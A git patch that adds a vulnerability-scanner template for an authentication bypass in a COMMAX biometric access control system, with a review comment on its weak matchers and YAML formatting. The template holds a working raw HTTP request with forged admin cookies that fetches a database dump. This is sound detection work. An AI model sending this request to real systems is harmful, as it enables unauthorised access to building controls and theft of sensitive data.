From cad976abda4a125268f79613ceec84482a79a4be Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Sun, 22 Aug 2021 18:19:34 +0900
Subject: [PATCH] Create commax-biometric-access-control-system-auth-bypass.yaml

The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.

Signed-off-by: GwanYeong Kim
---
 ...ric-access-control-system-auth-bypass.yaml | 36 +++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml

diff --git a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml
new file mode 100644
index 0000000000..a6afb6744c
--- /dev/null
+++ b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml
@@ -0,0 +1,36 @@
+id: commax-biometric-access-control-system-auth-bypass
+
+info:
+ name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
+ author: gy741
+ severity: critical
+ description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+ reference: |
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
+ tags: commax,auth-bypass
+
+requests:
+ - raw:
+ - |
+ GET /db_dump.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Referer: {{BaseURL}}/user_add.php
+ Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "::: COMMAX :::"
+ - "COMMAX"
+ condition: or
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
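Review bot: The matchers cannot distinguish a successful bypass from an ordinary response: with `condition: or`, any 200 text/html page that merely contains `COMMAX` (plausibly the product's own login page, if an unauthenticated request to `db_dump.php` is re-rendered with status 200) satisfies all three matchers, so the template will flag a host whether or not the supplied cookie values were honoured, and operators triaging scan output get false positives. Tighten the word matcher to content that appears only in the protected `db_dump.php` output (not visible in this patch) or add a `negative: true` word matcher for the login form, and drop the bare `"COMMAX"` alternative. Separately, `reference: |` makes the URL a literal string beginning with `- ` rather than a YAML list item; write it as `reference:` followed by `  - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php`.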